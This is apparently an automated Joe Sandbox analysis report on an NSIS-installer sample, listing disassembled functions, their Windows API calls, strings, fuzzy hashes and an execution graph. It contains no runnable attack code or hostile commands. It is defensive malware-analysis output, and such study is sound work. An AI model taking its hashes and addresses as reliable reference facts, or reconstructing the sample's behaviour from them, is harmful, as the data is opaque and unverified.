                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1855880593.0000000070091000.00000020.00000001.01000000.00000004.sdmp, Offset: 70090000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1855819178.0000000070090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1855965653.0000000070094000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1855996025.0000000070096000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_70090000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeGlobal
                                                                                                            • String ID:
                                                                                                            • API String ID: 2979337801-0
                                                                                                            • Opcode ID: 48cab87c047df78743651730741a72010dbaf07530908430e1becba22478f77f
                                                                                                            • Instruction ID: e437b65b763aa35e47456aa5ef3ddcbd52917a2cf3b5700c3c4e47ab291d62f8
                                                                                                            • Opcode Fuzzy Hash: 48cab87c047df78743651730741a72010dbaf07530908430e1becba22478f77f
                                                                                                            • Instruction Fuzzy Hash: 4651F532F76055AECB129FA4C8805ED77FBEB44B30B10425AE406A3354D770AE81B79E
                                                                                                            Function 70092394 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 700924D6
                                                                                                              • Part of subcall function 7009122C: lstrcpynW.KERNEL32(00000000,?,700912DF,00000019,700911BE,-000000A0), ref: 7009123C
                                                                                                            • GlobalAlloc.KERNEL32(00000040), ref: 7009245C
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 70092477
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1855880593.0000000070091000.00000020.00000001.01000000.00000004.sdmp, Offset: 70090000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1855819178.0000000070090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1855965653.0000000070094000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1855996025.0000000070096000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_70090000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                            • String ID:
                                                                                                            • API String ID: 4216380887-0
                                                                                                            • Opcode ID: 7023aa4b27ef49ea52296a6cd5e5d0cc00dd98e5ca7be6d16937fea4ba5435e0
                                                                                                            • Instruction ID: be975426a80bbd8ba3e1072c43150a1c9d9c0c7e0ea22cd262cf47fad4984042
                                                                                                            • Opcode Fuzzy Hash: 7023aa4b27ef49ea52296a6cd5e5d0cc00dd98e5ca7be6d16937fea4ba5435e0
                                                                                                            • Instruction Fuzzy Hash: CE41E1B1128305DFD320DF31D844A6E77F9FB88B30B22891EF14687691EB74A544EB69
                                                                                                            Function 00401DB9 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetDC.USER32(?), ref: 00401DBC
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                            • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                            • String ID:
                                                                                                            • API String ID: 3808545654-0
                                                                                                            • Opcode ID: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
                                                                                                            • Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
                                                                                                            • Opcode Fuzzy Hash: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
                                                                                                            • Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D
                                                                                                            Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 1849352358-0
                                                                                                            • Opcode ID: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
                                                                                                            • Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
                                                                                                            • Opcode Fuzzy Hash: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
                                                                                                            • Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38
                                                                                                            Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Timeout
                                                                                                            • String ID: !
                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                            • Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                            • Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
                                                                                                            • Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                            • Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18
                                                                                                            Function 00405CBD Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004036EF,?,00000006,00000008,0000000A), ref: 00405CC3
                                                                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004036EF,?,00000006,00000008,0000000A), ref: 00405CCD
                                                                                                            • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405CDF
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CBD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 2659869361-297319885
                                                                                                            • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                            • Instruction ID: 595fb0ef6d3bfc82903baa2f142a0de03b6946227050b98ce465681b6cfad29b
                                                                                                            • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                            • Instruction Fuzzy Hash: AED0A771101630AAC111AB448D04CDF63ACEE45304342003BF601B70A2CB7C1D6287FD
                                                                                                            Function 00405DC5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,76F92EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,00000000), ref: 00405D76
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                            • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,?,?,76F92EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,00000000), ref: 00405E1E
                                                                                                            • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,?,?,76F92EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76F92EE0), ref: 00405E2E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                            • String ID: 0_B
                                                                                                            • API String ID: 3248276644-2128305573
                                                                                                            • Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                            • Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
                                                                                                            • Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                            • Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE
                                                                                                            Function 004059D1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00405A07
                                                                                                            Strings
                                                                                                            • Error launching installer, xrefs: 004059E4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                            • String ID: Error launching installer
                                                                                                            • API String ID: 3712363035-66219284
                                                                                                            • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                            • Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
                                                                                                            • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                            • Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C
                                                                                                            Function 00403A43 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76F92EE0,00403A1A,76F93420,00403819,00000006,?,00000006,00000008,0000000A), ref: 00403A5D
                                                                                                            • GlobalFree.KERNEL32(?), ref: 00403A64
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A55
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Free$GlobalLibrary
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 1100898210-297319885
                                                                                                            • Opcode ID: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                                                            • Instruction ID: 7abb624b42f0eb5bf3103b67fd66c27476adae564a61ccebc81435f3e7eba37d
                                                                                                            • Opcode Fuzzy Hash: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                                                            • Instruction Fuzzy Hash: 73E0EC326111205BC6229F59AD44B5E776D6F58B22F0A023AE8C07B26087745D938F98
                                                                                                            Function 700910E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 7009116A
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 700911C7
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 700911D9
                                                                                                            • GlobalFree.KERNEL32(?), ref: 70091203
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1855880593.0000000070091000.00000020.00000001.01000000.00000004.sdmp, Offset: 70090000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1855819178.0000000070090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1855965653.0000000070094000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1855996025.0000000070096000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_70090000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$Free$Alloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 1780285237-0
                                                                                                            • Opcode ID: e6ef47b9dba96a819223b15cba94aeccfe2c891bc405faf8ed71c565c50264af
                                                                                                            • Instruction ID: 3a08d5ff8cfc4124ac6568208cfc44b4dfb27c4045b72bb20fc3b67911026678
                                                                                                            • Opcode Fuzzy Hash: e6ef47b9dba96a819223b15cba94aeccfe2c891bc405faf8ed71c565c50264af
                                                                                                            • Instruction Fuzzy Hash: D831A772620101AFE3109F66DD45AAD77F9FB85B31720011AFA42E7364E774E811A7A8
                                                                                                            Function 00405E43 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                                                                                            • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 190613189-0
                                                                                                            • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                            • Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
                                                                                                            • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                            • Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:10%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:1.7%
                                                                                                            Total number of Nodes:362
                                                                                                            Total number of Limit Nodes:27
                                                                                                            execution_graph 40808 38a120c0 40811 38a120ed 40808->40811 40809 38a1213c 40809->40809 40811->40809 40812 38a117fc 40811->40812 40813 38a11807 40812->40813 40819 38a117d0 40813->40819 40815 38a1229c 40823 384eec1a 40815->40823 40827 384e95e8 40815->40827 40816 38a122a5 40816->40809 40820 38a117db 40819->40820 40831 38a1181c 40820->40831 40822 38a122f5 40822->40815 40824 384eec22 40823->40824 40825 384eec47 40823->40825 40824->40825 40835 384ee7f4 40824->40835 40825->40816 40828 384e95f3 40827->40828 40829 384ee7f4 3 API calls 40828->40829 40830 384eec47 40828->40830 40829->40830 40830->40816 40832 38a11827 40831->40832 40833 38a12461 GetCurrentThreadId 40832->40833 40834 38a1248b 40832->40834 40833->40834 40834->40822 40837 384ee7ff 40835->40837 40836 384ef111 40836->40825 40837->40836 40841 384efa68 40837->40841 40847 384efaa1 40837->40847 40852 384efab0 40837->40852 40842 384efa78 40841->40842 40843 384efaad 40841->40843 40842->40836 40844 384efb8a 40843->40844 40857 38a100b0 40843->40857 40866 38a100c0 40843->40866 40848 384efaad 40847->40848 40849 384efb8a 40848->40849 40850 38a100b0 3 API calls 40848->40850 40851 38a100c0 3 API calls 40848->40851 40850->40849 40851->40849 40854 384efadb 40852->40854 40853 384efb8a 40853->40853 40854->40853 40855 38a100b0 3 API calls 40854->40855 40856 38a100c0 3 API calls 40854->40856 40855->40853 40856->40853 40858 38a100ba 40857->40858 40859 38a100fd CreateWindowExW 40857->40859 40860 38a100f5 40858->40860 40863 38a100b0 2 API calls 40858->40863 40871 38a10110 40858->40871 40875 38a10104 40858->40875 40862 38a10234 40859->40862 40860->40844 40862->40862 40863->40860 40868 38a100b0 3 API calls 40866->40868 40869 38a10110 CreateWindowExW 40866->40869 40870 38a10104 CreateWindowExW 40866->40870 40867 38a100f5 40867->40844 40868->40867 40869->40867 40870->40867 40872 38a10178 CreateWindowExW 40871->40872 40874 38a10234 40872->40874 40874->40874 40876 38a10110 CreateWindowExW 40875->40876 40878 38a10234 40876->40878 40878->40878 40879 38a12020 SetTimer 40880 38a1208c 40879->40880 40881 38a1b070 40882 38a1b080 40881->40882 40885 38a1a094 40882->40885 40886 38a1a09f 40885->40886 40889 38a1a1a4 40886->40889 40891 38a1a1af 40889->40891 40890 38a1b099 40891->40890 40897 38a16c00 40891->40897 40894 38a16c00 3 API calls 40895 38a1b429 40894->40895 40895->40890 40896 38a16c00 3 API calls 40895->40896 40896->40890 40898 38a16c0a 40897->40898 40901 38a16db8 40898->40901 40905 38a16e77 40901->40905 40917 38a16e88 40901->40917 40902 38a16c3e 40902->40894 40907 38a16ec0 40905->40907 40906 38a16f15 40906->40902 40907->40906 40909 38a1722f 40907->40909 40929 38a16fa0 CreateWindowExW CreateWindowExW CreateWindowExW 40907->40929 40910 38a17447 40909->40910 40912 38a17382 40909->40912 40930 38a14108 40909->40930 40910->40912 40913 38a16c00 3 API calls 40910->40913 40912->40902 40914 38a17658 40913->40914 40915 38a16c00 3 API calls 40914->40915 40916 38a1767c 40914->40916 40915->40916 40918 38a16ec0 40917->40918 40920 38a16f15 40918->40920 40922 38a1722f 40918->40922 40947 38a16fa0 CreateWindowExW CreateWindowExW CreateWindowExW 40918->40947 40920->40902 40921 38a17447 40924 38a17382 40921->40924 40925 38a16c00 3 API calls 40921->40925 40922->40921 40923 38a14108 3 API calls 40922->40923 40922->40924 40923->40921 40924->40902 40926 38a17658 40925->40926 40927 38a16c00 3 API calls 40926->40927 40928 38a1767c 40926->40928 40927->40928 40929->40909 40931 38a14113 40930->40931 40936 38a18400 40931->40936 40933 38a1901f 40934 38a16e88 3 API calls 40933->40934 40935 38a19039 40934->40935 40935->40910 40938 38a1840b 40936->40938 40937 38a191c8 40937->40933 40938->40937 40939 38a16e88 3 API calls 40938->40939 40941 38a1910f 40939->40941 40940 38a18400 3 API calls 40940->40941 40941->40940 40942 38a191ea 40941->40942 40943 38a1922d 40942->40943 40944 384efa68 3 API calls 40942->40944 40945 384efab0 3 API calls 40942->40945 40946 384efaa1 3 API calls 40942->40946 40943->40933 40944->40943 40945->40943 40946->40943 40947->40922 40948 ad030 40949 ad048 40948->40949 40950 ad0a2 40949->40950 40956 38a103f0 40949->40956 40959 38a102c8 40949->40959 40964 38a102b7 40949->40964 40969 38a11bd0 40949->40969 40974 38a11bc0 40949->40974 40958 38a10407 40956->40958 40979 38a10841 40956->40979 40958->40950 40960 38a102ee 40959->40960 40962 38a11bc0 3 API calls 40960->40962 40963 38a11bd0 3 API calls 40960->40963 40961 38a1030f 40961->40950 40962->40961 40963->40961 40965 38a102c8 40964->40965 40967 38a11bc0 3 API calls 40965->40967 40968 38a11bd0 3 API calls 40965->40968 40966 38a1030f 40966->40950 40967->40966 40968->40966 40970 38a11bfd 40969->40970 40971 38a11c2f 40970->40971 41022 38a11d48 40970->41022 41032 38a11d58 40970->41032 40975 38a11bd0 40974->40975 40976 38a11c2f 40975->40976 40977 38a11d48 3 API calls 40975->40977 40978 38a11d58 3 API calls 40975->40978 40977->40976 40978->40976 40980 38a10856 40979->40980 40982 38a10938 40979->40982 40980->40958 40983 38a10948 40982->40983 40984 38a10965 40983->40984 40987 38a10980 40983->40987 40999 38a10970 40983->40999 40984->40980 40988 38a109c6 GetCurrentProcess 40987->40988 40990 38a10a11 